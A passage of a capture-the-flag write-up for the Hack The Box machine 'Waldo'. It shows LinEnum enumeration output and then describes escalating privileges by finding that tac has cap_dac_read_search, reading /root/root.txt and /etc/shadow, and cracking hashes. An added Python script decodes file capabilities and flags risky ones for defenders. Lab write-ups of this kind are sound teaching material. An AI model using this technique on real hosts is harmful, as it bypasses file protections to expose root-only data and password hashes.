-rw------- 1 root root 9 Sep 13 04:09 cron.daily
-rw------- 1 root root 9 Sep 13 04:19 cron.monthly
-rw------- 1 root root 9 Sep 13 04:14 cron.weekly

### NETWORKING ##########################################
[-] Network and IP info:
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:50:56:a4:80:14 brd ff:ff:ff:ff:ff:ff
inet 10.10.10.87/24 brd 10.10.10.255 scope global ens33
valid_lft forever preferred_lft forever
3: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default
link/ether 02:42:a6:3e:f0:61 brd ff:ff:ff:ff:ff:ff
inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
valid_lft forever preferred_lft forever

[-] ARP history:
10.10.10.2 dev ens33 lladdr 00:50:56:a4:99:88 REACHABLE

[-] Nameserver(s):
nameserver 10.10.10.2

[-] Nameserver(s):
Global
DNS Servers: 10.10.10.2
DNS Domain: localdomain
DNSSEC NTA: 10.in-addr.arpa 16.172.in-addr.arpa 168.192.in-addr.arpa 17.172.in-addr.arpa 18.172.in-addr.arpa 19.172.in-addr.arpa 20.172.in-addr.arpa 21.172.in-addr.arpa 22.172.in-addr.arpa 23.172.in-addr.arpa 24.172.in-addr.arpa 25.172.in-addr.arpa 26.172.in-addr.arpa 27.172.in-addr.arpa 28.172.in-addr.arpa 29.172.in-addr.arpa 30.172.in-addr.arpa 31.172.in-addr.arpa corp d.f.ip6.arpa home internal intranet lan local private test
Link 3 (docker0)
Current Scopes: none
LLMNR setting: yes
MulticastDNS setting: no
DNSSEC setting: no
DNSSEC supported: no
Link 2 (ens33)
Current Scopes: LLMNR/IPv4
LLMNR setting: yes
MulticastDNS setting: no
DNSSEC setting: no
DNSSEC supported: no

[-] Default route:
default via 10.10.10.2 dev ens33 onlink

[-] Listening TCP:
State Recv-Q Send-Q Local Address:Port Peer Address:Port
ESTAB 0 0 127.0.0.1:35820 127.0.1.1:ssh
ESTAB 0 0 127.0.1.1:ssh 127.0.0.1:35820
ESTAB 0 10834 10.10.10.87:8888 10.10.14.19:58820

### SERVICES #############################################
[-] Running processes:
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.6 56908 6736 ? Ss 04:04 0:01 /sbin/init
root 2 0.0 0.0 0 0 ? S 04:04 0:00 [kthreadd]
root 3 0.0 0.0 0 0 ? S 04:04 0:00 [ksoftirqd/0]
root 5 0.0 0.0 0 0 ? S< 04:04 0:00 [kworker/0:0H]
root 7 0.0 0.0 0 0 ? S 04:04 0:00 [rcu_sched]
root 8 0.0 0.0 0 0 ? S 04:04 0:00 [rcu_bh]
root 9 0.0 0.0 0 0 ? S 04:04 0:00 [migration/0]
root 10 0.0 0.0 0 0 ? S< 04:04 0:00 [lru-add-drain]
root 11 0.0 0.0 0 0 ? S 04:04 0:00 [watchdog/0]
root 12 0.0 0.0 0 0 ? S 04:04 0:00 [cpuhp/0]
root 13 0.0 0.0 0 0 ? S 04:04 0:00 [kdevtmpfs]
root 14 0.0 0.0 0 0 ? S< 04:04 0:00 [netns]
root 15 0.0 0.0 0 0 ? S 04:04 0:00 [khungtaskd]
root 16 0.0 0.0 0 0 ? S 04:04 0:00 [oom_reaper]
root 17 0.0 0.0 0 0 ? S< 04:04 0:00 [writeback]
root 18 0.0 0.0 0 0 ? S 04:04 0:00 [kcompactd0]
root 19 0.0 0.0 0 0 ? SN 04:04 0:00 [ksmd]
root 21 0.0 0.0 0 0 ? SN 04:04 0:00 [khugepaged]
root 22 0.0 0.0 0 0 ? S< 04:04 0:00 [crypto]
root 23 0.0 0.0 0 0 ? S< 04:04 0:00 [kintegrityd]
root 24 0.0 0.0 0 0 ? S< 04:04 0:00 [bioset]
root 25 0.0 0.0 0 0 ? S< 04:04 0:00 [kblockd]
root 26 0.0 0.0 0 0 ? S< 04:04 0:00 [devfreq_wq]
root 27 0.0 0.0 0 0 ? S< 04:04 0:00 [watchdogd]
root 28 0.0 0.0 0 0 ? S 04:04 0:00 [kswapd0]
root 29 0.0 0.0 0 0 ? S< 04:04 0:00 [vmstat]
root 41 0.0 0.0 0 0 ? S< 04:04 0:00 [kthrotld]
root 42 0.0 0.0 0 0 ? S< 04:04 0:00 [ipv6_addrconf]
root 75 0.0 0.0 0 0 ? S< 04:04 0:00 [ata_sff]
root 76 0.0 0.0 0 0 ? S 04:04 0:00 [scsi_eh_0]
root 77 0.0 0.0 0 0 ? S 04:04 0:00 [scsi_eh_1]
root 78 0.0 0.0 0 0 ? S< 04:04 0:00 [scsi_tmf_0]
root 79 0.0 0.0 0 0 ? S< 04:04 0:00 [scsi_tmf_1]
root 80 0.0 0.0 0 0 ? S< 04:04 0:00 [vmw_pvscsi_wq_0]
root 81 0.0 0.0 0 0 ? S 04:04 0:00 [scsi_eh_2]
root 82 0.0 0.0 0 0 ? S 04:04 0:00 [kworker/u256:1]
root 83 0.0 0.0 0 0 ? S< 04:04 0:00 [scsi_tmf_2]
root 84 0.0 0.0 0 0 ? S< 04:04 0:00 [bioset]
root 128 0.0 0.0 0 0 ? S< 04:04 0:00 [bioset]
root 132 0.0 0.0 0 0 ? S< 04:04 0:00 [kworker/0:1H]
root 164 0.0 0.0 0 0 ? S 04:04 0:00 [jbd2/sda1-8]
root 165 0.0 0.0 0 0 ? S< 04:04 0:00 [ext4-rsv-conver]
root 191 0.0 1.0 133772 10444 ? Ss 04:04 0:13 /usr/bin/vmtoolsd
root 192 0.0 0.0 0 0 ? S 04:04 0:00 [kauditd]
root 196 0.0 0.4 56800 4836 ? Ss 04:04 0:00 /lib/systemd/systemd-journald
root 221 0.0 0.3 45256 3440 ? Ss 04:04 0:00 /lib/systemd/systemd-udevd
root 279 0.0 0.0 0 0 ? S< 04:04 0:00 [ttm_swap]
root 310 0.0 0.0 0 0 ? S< 04:04 0:00 [edac-poller]
systemd+ 348 0.0 0.4 127284 4200 ? Ssl 04:04 0:01 /lib/systemd/systemd-timesyncd
root 366 0.0 0.3 250116 3260 ? Ssl 04:04 0:00 /usr/sbin/rsyslogd -n
root 367 0.0 1.8 153488 18452 ? Ss 04:04 0:00 /usr/bin/VGAuthService
root 368 0.0 0.2 29664 2848 ? Ss 04:04 0:00 /usr/sbin/cron -f
message+ 370 0.0 0.3 45116 3676 ? Ss 04:04 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation
root 384 0.0 0.4 46524 4800 ? Ss 04:04 0:00 /lib/systemd/systemd-logind
root 509 0.1 6.4 452516 64620 ? Ssl 04:04 0:20 /usr/bin/dockerd -H fd://
root 512 0.0 0.1 14536 1660 tty1 Ss+ 04:04 0:00 /sbin/agetty --noclear tty1 linux
root 513 0.0 0.6 69944 6208 ? Ss 04:04 0:00 /usr/sbin/sshd -D
root 607 0.1 2.2 235016 22424 ? Ssl 04:05 0:20 docker-containerd --config /var/run/docker/containerd/containerd.toml
root 734 0.0 0.4 7648 4388 ? Sl 04:05 0:00 docker-containerd-shim -namespace moby -workdir /var/lib/docker/containerd/daemon/io.containerd.runtime.v1.linux/moby/16c6cae0786900838a54b9b3ce253ddd80c3ccdcea93e6c5444e2a8a5a1eaebd -address /var/run/docker/containerd/docker-containerd.sock -containerd-binary /usr/bin/docker-containerd -runtime-root /var/run/docker/runtime-runc
root 747 0.0 1.6 85124 16824 pts/0 Ss+ 04:05 0:04 /usr/bin/python2 /usr/bin/supervisord -c /etc/supervisor/conf.d/supervisord.conf
root 777 0.0 0.3 12784 3432 pts/0 S 04:05 0:00 nginx: master process nginx -g daemon off;
root 778 0.0 0.2 7320 2664 pts/0 S 04:05 0:00 /usr/sbin/sshd -D -e
root 779 0.0 1.7 133368 17404 pts/0 S 04:05 0:01 php-fpm: master process (/etc/php7/php-fpm.conf)
systemd+ 780 0.0 0.1 13264 1680 pts/0 S 04:05 0:00 nginx: worker process
root 782 0.0 0.2 7352 2716 ? Ss 04:06 0:00 sshd: nobody [priv]
nobody 784 0.0 0.3 9112 3748 ? S 04:06 0:02 sshd: nobody@pts/1
nobody 785 0.0 0.1 1544 1028 ? Ss 04:06 0:00 -sh
root 1288 0.0 0.0 0 0 ? S 06:08 0:08 [kworker/0:1]
nobody 1364 0.0 0.3 8460 3716 ? S+ 06:27 0:01 ssh monitor@waldo -i .monitor
root 1365 0.0 0.7 101380 7180 ? Ss 06:27 0:00 sshd: monitor [priv]
monitor 1367 0.0 0.6 64872 6088 ? Ss 06:27 0:00 /lib/systemd/systemd --user
monitor 1368 0.0 0.1 84492 1564 ? S 06:27 0:00 (sd-pam)
monitor 1374 0.0 0.4 101380 4700 ? S 06:27 0:00 sshd: monitor@pts/0
monitor 1375 0.0 0.4 21176 4908 pts/0 Ss 06:27 0:00 -rbash
monitor 1442 0.0 0.0 5856 692 pts/0 S 06:50 0:00 red -p red:
monitor 1487 0.0 0.0 4288 796 pts/0 S 07:27 0:00 sh -c /bin/bash
monitor 1488 0.0 0.5 21216 5096 pts/0 S 07:27 0:00 /bin/bash
systemd+ 1741 0.0 0.4 49620 4052 ? Ss 07:50 0:00 /lib/systemd/systemd-resolved
root 1754 0.0 0.0 0 0 ? S 07:50 0:00 [kworker/u256:0]
root 2381 0.0 0.0 0 0 ? S 09:28 0:00 [kworker/0:2]
root 2382 0.0 0.0 0 0 ? S 09:33 0:00 [kworker/0:0]
monitor 2391 0.0 0.3 12140 3888 pts/0 S+ 09:38 0:00 /bin/bash /tmp/LinEnum.sh
monitor 2392 0.0 0.3 12176 3372 pts/0 S+ 09:38 0:00 /bin/bash /tmp/LinEnum.sh
monitor 2393 0.0 0.0 5844 688 pts/0 S+ 09:38 0:00 tee -a
monitor 2564 0.0 0.2 12176 2924 pts/0 S+ 09:38 0:00 /bin/bash /tmp/LinEnum.sh
monitor 2565 0.0 0.3 38304 3168 pts/0 R+ 09:38 0:00 ps aux

[-] Process binaries and associated permissions (from above list):
776K -rwxr-xr-x 1 root root 773K Mar 1 2018 /usr/sbin/sshd
640K -rwxr-xr-x 1 root root 637K Jan 18 2017 /usr/sbin/rsyslogd
48K -rwxr-xr-x 1 root root 48K Oct 7 2017 /usr/sbin/cron
48K -rwxr-xr-x 1 root root 48K Jul 25 2017 /usr/bin/vmtoolsd
152K -rwxr-xr-x 1 root root 149K Jul 25 2017 /usr/bin/VGAuthService
0 lrwxrwxrwx 1 root root 9 Jan 24 2017 /usr/bin/python2 -> python2.7
79M -rwxr-xr-x 1 root root 79M Apr 10 14:20 /usr/bin/dockerd
220K -rwxr-xr-x 1 root root 219K Mar 2 2018 /usr/bin/dbus-daemon
0 lrwxrwxrwx 1 root root 20 Mar 23 08:55 /sbin/init -> /lib/systemd/systemd
60K -rwxr-xr-x 1 root root 57K Mar 7 2018 /sbin/agetty
456K -rwxr-xr-x 1 root root 455K Mar 23 08:55 /lib/systemd/systemd-udevd
40K -rwxr-xr-x 1 root root 39K Mar 23 08:55 /lib/systemd/systemd-timesyncd
316K -rwxr-xr-x 1 root root 315K Mar 23 08:55 /lib/systemd/systemd-resolved
204K -rwxr-xr-x 1 root root 203K Mar 23 08:55 /lib/systemd/systemd-logind
120K -rwxr-xr-x 1 root root 119K Mar 23 08:55 /lib/systemd/systemd-journald
1.1M -rwxr-xr-x 1 root root 1.1M Mar 23 08:55 /lib/systemd/systemd
1.1M -rwxr-xr-x 1 root root 1.1M May 15 2017 /bin/bash

[-] /etc/init.d/ binary permissions:
total 88
drwxr-xr-x 2 root root 4096 Jul 15 09:48 .
drwxr-xr-x 80 root root 4096 Jul 24 05:50 ..
-rwxr-xr-x 1 root root 2014 May 29 2017 anacron
-rwxr-xr-x 1 root root 2948 Sep 13 2017 bluetooth
-rwxr-xr-x 1 root root 1232 Apr 6 2017 console-setup.sh
-rwxr-xr-x 1 root root 3049 Oct 7 2017 cron
-rwxr-xr-x 1 root root 2813 Mar 2 2018 dbus
-rwxr-xr-x 1 root root 3843 Apr 10 14:09 docker
-rwxr-xr-x 1 root root 3809 Mar 22 2017 hwclock.sh
-rwxr-xr-x 1 root root 1479 May 18 2016 keyboard-setup.sh
-rwxr-xr-x 1 root root 2044 Dec 25 2016 kmod
-rwxr-xr-x 1 root root 1364 Mar 17 2017 netfilter-persistent
-rwxr-xr-x 1 root root 4597 Sep 16 2016 networking
-rwxr-xr-x 1 root root 1846 Jul 25 2017 open-vm-tools
-rwxr-xr-x 1 root root 1191 Nov 22 2016 procps
-rwxr-xr-x 1 root root 4355 Dec 10 2017 rsync
-rwxr-xr-x 1 root root 2868 Jan 18 2017 rsyslog
-rwxr-xr-x 1 root root 4033 Mar 1 2018 ssh
-rwxr-xr-x 1 root root 6087 Dec 3 2017 udev

### SOFTWARE #############################################

### INTERESTING FILES ####################################
[-] Useful file locations:
/bin/nc
/bin/netcat
/usr/bin/wget
/usr/bin/gcc
/usr/bin/curl

[-] Installed compilers:
ii gcc 4:6.3.0-4 amd64 GNU C compiler
ii gcc-6 6.3.0-18+deb9u1 amd64 GNU C compiler

[-] Can we read/write sensitive files:
-rw-r--r-- 1 root root 1627 May 3 16:50 /etc/passwd
-rw-r--r-- 1 root root 773 May 3 16:50 /etc/group
-rw-r--r-- 1 root root 869 May 3 16:50 /etc/profile
-rw-r----- 1 root shadow 1218 May 3 16:50 /etc/shadow

[-] Can't search *.conf files as no keyword was entered
[-] Can't search *.php files as no keyword was entered
[-] Can't search *.log files as no keyword was entered
[-] Can't search *.ini files as no keyword was entered

[-] All *.conf files in /etc (recursive 1 level):
-rw-r--r-- 1 root root 2792 Jul 24 05:50 /etc/sysctl.conf
-rw-r--r-- 1 root root 1260 Mar 16 2016 /etc/ucf.conf
-rw-r--r-- 1 root root 7431 May 1 23:26 /etc/ca-certificates.conf
-rw-r--r-- 1 root root 9 Aug 7 2006 /etc/host.conf
-rw-r--r-- 1 root root 346 Nov 30 2016 /etc/discover-modprobe.conf
-rw-r--r-- 1 root root 3173 Mar 2 2018 /etc/reportbug.conf
-rw-r--r-- 1 root root 60 Jul 23 10:14 /etc/resolv.conf
-rw-r--r-- 1 root root 1963 Jan 18 2017 /etc/rsyslog.conf
-rw-r--r-- 1 root root 497 Dec 31 2017 /etc/nsswitch.conf
-rw-r--r-- 1 root root 2969 May 21 2017 /etc/debconf.conf
-rw-r--r-- 1 root root 280 Jun 20 2014 /etc/fuse.conf
-rw-r--r-- 1 root root 4781 Jan 24 2017 /etc/hdparm.conf
-rw-r--r-- 1 root root 191 Apr 12 2017 /etc/libaudit.conf
-rw-r--r-- 1 root root 2981 May 1 23:03 /etc/adduser.conf
-rw-r--r-- 1 root root 2584 Aug 1 2016 /etc/gai.conf
-rw-r--r-- 1 root root 599 May 5 2015 /etc/logrotate.conf
-rw-r--r-- 1 root root 144 May 1 23:30 /etc/kernel-img.conf
-rw-r--r-- 1 root root 552 May 27 2017 /etc/pam.conf
-rw-r--r-- 1 root root 973 Jan 31 2017 /etc/mke2fs.conf
-rw-r--r-- 1 root root 604 Jun 26 2016 /etc/deluser.conf
-rw-r--r-- 1 root root 34 Apr 9 2017 /etc/ld.so.conf

[-] Current user's history files:
lrwxrwxrwx 1 root root 9 Jul 24 07:58 /home/monitor/.bash_history -> /dev/null

[-] Location and contents (if accessible) of .bash_history file(s):
/home/monitor/.bash_history

[-] Any interesting mail in /var/mail:
total 8
drwxrwsr-x 2 root mail 4096 May 1 23:03 .
drwxr-xr-x 11 root root 4096 May 1 23:03 ..

[+] Looks like we're hosting Docker:
Docker version 18.04.0-ce, build 3d479c0

### SCAN COMPLETE ####################################
monitor@waldo:/tmp$
Privilege Escalation
Privesc on this machine took ages. I got stuck down various rabbit holes for hours, days even. I’m not going to lie, I don’t think that without some HTB forum hints I would have got much further in any reasonable amount of time.
The app-dev folder contains code and executables for a log monitoring application, and since the passwd file says the monitor user is “for editing source and monitoring logs” I assumed that the box-writer intended us to edit some source code. The logMonitor binary in the app-dev folder doesn’t do what it’s supposed to do: feeding it options like -a doesn’t read the log that the source code indicates it should, and only the -h help option works. However, there is a subfolder with a 0.1 version which DOES work. The weird thing is that this file is not root-owned and does not have the SUID bit set, which leaves you wondering how it is able to access log files that the other app cannot, even though both are being run by the same user. So the question becomes “what is the difference between this and the non-working version?”:
The answer turns out to be Capabilities, a security feature that lets you hand out subdivisions of superuser privilege (such as bypassing file read permissions) to individual executables; see https://man7.org/linux/man-pages/man7/capabilities.7.html. If you use the getcap command you can see which capabilities the updated logMonitor binary has that the other one doesn’t. Maybe there is a clever way of using this that involves editing the source code to give yourself various powers, overwriting logMonitor-0.1 and abusing that; there is also a python file that appears to check a file and do something with its hash, which again hints at replacing this file, but I couldn’t work out if there is. However, running getcap -r / 2>/dev/null shows the capability settings for all files we can access, and it shows up a command called tac (which is cat in reverse) that can output the contents of files. Since it has been given the root-level file-read capability, it can read /root/root.txt and we’ve got our flag.
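To make the two points above concrete (what actually differs between the working and non-working logMonitor binaries, and what a getcap -r sweep is telling you), here is an added example that is not code from the original writeup or from the box. It decodes the security.capability extended attribute that setcap writes (the only difference between an otherwise identical capability-bearing and capability-less binary), renders it in getcap's own notation, and flags the capabilities a defender would want to see raised against any binary, cap_dac_read_search (the file-read bypass) among them. The xattr bytes and getcap lines are constructed for the example; the app-dev path used in the sample output is assumed, not taken from the box.

```python
"""Added example (not the writeup's code): decode Linux file capabilities the
way getcap does and flag those that bypass file permissions. The xattr values
and getcap lines below are constructed for this example."""
import os
import struct

# Capability numbers from <linux/capability.h>; list index == number.
CAP_NAMES = [
    "cap_chown", "cap_dac_override", "cap_dac_read_search", "cap_fowner",
    "cap_fsetid", "cap_kill", "cap_setgid", "cap_setuid", "cap_setpcap",
    "cap_linux_immutable", "cap_net_bind_service", "cap_net_broadcast",
    "cap_net_admin", "cap_net_raw", "cap_ipc_lock", "cap_ipc_owner",
    "cap_sys_module", "cap_sys_rawio", "cap_sys_chroot", "cap_sys_ptrace",
    "cap_sys_pacct", "cap_sys_admin", "cap_sys_boot", "cap_sys_nice",
    "cap_sys_resource", "cap_sys_time", "cap_sys_tty_config", "cap_mknod",
    "cap_lease", "cap_audit_write", "cap_audit_control", "cap_setfcap",
    "cap_mac_override", "cap_mac_admin", "cap_syslog", "cap_wake_alarm",
    "cap_block_suspend", "cap_audit_read", "cap_perfmon", "cap_bpf",
    "cap_checkpoint_restore",
]
# File capabilities that let an ordinary user read or take over files that DAC
# permissions would otherwise protect (/etc/shadow, /root/root.txt, ...).
RISKY_CAPS = {
    "cap_dac_read_search": "bypasses file read and directory search checks",
    "cap_dac_override": "bypasses all file permission checks",
    "cap_setuid": "can switch to uid 0",
    "cap_sys_admin": "catch-all administrative capability",
}
# struct vfs_cap_data (little endian): magic_etc, then (permitted, inheritable)
# u32 pairs for bits 0-31 and 32-63; revision 3 appends a rootid u32.
VFS_CAP_REVISION_MASK, VFS_CAP_REVISION_2, VFS_CAP_REVISION_3 = 0xFF000000, 0x02000000, 0x03000000
VFS_CAP_FLAGS_EFFECTIVE = 0x00000001


def decode_vfs_cap(blob):
    """Decode a raw security.capability xattr value into capability masks."""
    if len(blob) < 20:
        raise ValueError("vfs_cap_data too short: %d bytes" % len(blob))
    magic_etc, p_lo, i_lo, p_hi, i_hi = struct.unpack_from("<5I", blob, 0)
    revision = magic_etc & VFS_CAP_REVISION_MASK
    if revision not in (VFS_CAP_REVISION_2, VFS_CAP_REVISION_3):
        raise ValueError("unsupported vfs_cap_data revision 0x%08x" % revision)
    # Revision 3 (namespaced file caps) records the uid that owns the capability.
    rootid = struct.unpack_from("<I", blob, 20)[0] if revision == VFS_CAP_REVISION_3 else 0
    return {"revision": revision >> 24, "rootid": rootid,
            "effective": bool(magic_etc & VFS_CAP_FLAGS_EFFECTIVE),
            "permitted": p_lo | (p_hi << 32), "inheritable": i_lo | (i_hi << 32)}


def caps_as_text(caps):
    """Render masks in getcap's 'cap_a,cap_b+eip' form; the file's single
    effective flag raises every permitted or inheritable bit."""
    permitted, inheritable = caps["permitted"], caps["inheritable"]
    effective = (permitted | inheritable) if caps["effective"] else 0
    groups = {}  # flag letters -> capability names, in capability-number order
    for bit in range(64):
        flags = "".join(letter for letter, mask in (("e", effective), ("i", inheritable),
                        ("p", permitted)) if (mask >> bit) & 1)
        if flags:
            name = CAP_NAMES[bit] if bit < len(CAP_NAMES) else "cap_%d" % bit
            groups.setdefault(flags, []).append(name)
    return " ".join(",".join(names) + "+" + flags for flags, names in groups.items())


def read_file_caps(path):
    """Decoded capabilities of a file on disk, or None if it carries none
    (ENODATA: no xattr; ENOTSUP: filesystem without xattrs). Linux only."""
    try:
        return decode_vfs_cap(os.getxattr(path, "security.capability"))
    except OSError:
        return None


def parse_getcap_line(line):
    """Parse one getcap -r line into (path, {capability: flags}); accepts both
    the 'path = cap_x+ep' form seen on the box and the newer 'path cap_x=ep'."""
    path, sep, text = line.strip().partition(" = ")
    if not sep:
        path, _, text = line.strip().rpartition(" ")
    if not path or not text:
        return None
    caps = {}
    for group in text.split():  # e.g. 'cap_a,cap_b+ep' or 'cap_a=ep'
        op = "+" if "+" in group else "="
        if op in group:
            names, flags = group.split(op, 1)
            caps.update({name: flags for name in names.split(",")})
    return path, caps


def audit_getcap_output(lines):
    """Return (path, 'cap+flags', reason) for every risky file capability."""
    findings = []
    for path, caps in filter(None, map(parse_getcap_line, lines)):
        findings += [(path, name + "+" + flags, RISKY_CAPS[name])
                     for name, flags in caps.items() if name in RISKY_CAPS]
    return findings


# Constructed: what `setcap cap_dac_read_search+ei FILE` writes (v2 header with
# the effective flag, inheritable bit 2 set, nothing permitted).
WORKING_XATTR = struct.pack("<5I", VFS_CAP_REVISION_2 | VFS_CAP_FLAGS_EFFECTIVE, 0, 1 << 2, 0, 0)
# Constructed getcap -r output in the box's libcap style; the app-dev path is assumed.
SAMPLE_GETCAP = [
    "/usr/bin/ping = cap_net_raw+ep",
    "/usr/bin/tac = cap_dac_read_search+ei",
    "/home/monitor/app-dev/v0.1/logMonitor-0.1 = cap_dac_read_search+ei",
]

if __name__ == "__main__":
    print("working binary's xattr decodes to:", caps_as_text(decode_vfs_cap(WORKING_XATTR)))
    for path, cap, reason in audit_getcap_output(SAMPLE_GETCAP):
        print("RISKY %-48s %-24s %s" % (path, cap, reason))
```

On a live host, read_file_caps on the two logMonitor binaries gives the same answer as comparing their getcap lines: one carries an inheritable cap_dac_read_search with the effective flag set, the other has no security.capability attribute at all. From the defender's side, piping the real `getcap -r / 2>/dev/null` output into audit_getcap_output turns the manual scan the post describes into a repeatable check; anything in RISKY_CAPS on a general-purpose utility such as tac is a finding, whatever the stated justification.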
We can also read the shadow file and I ran JTR over the hashes found there but didn’t get a hit with the wordlists I used.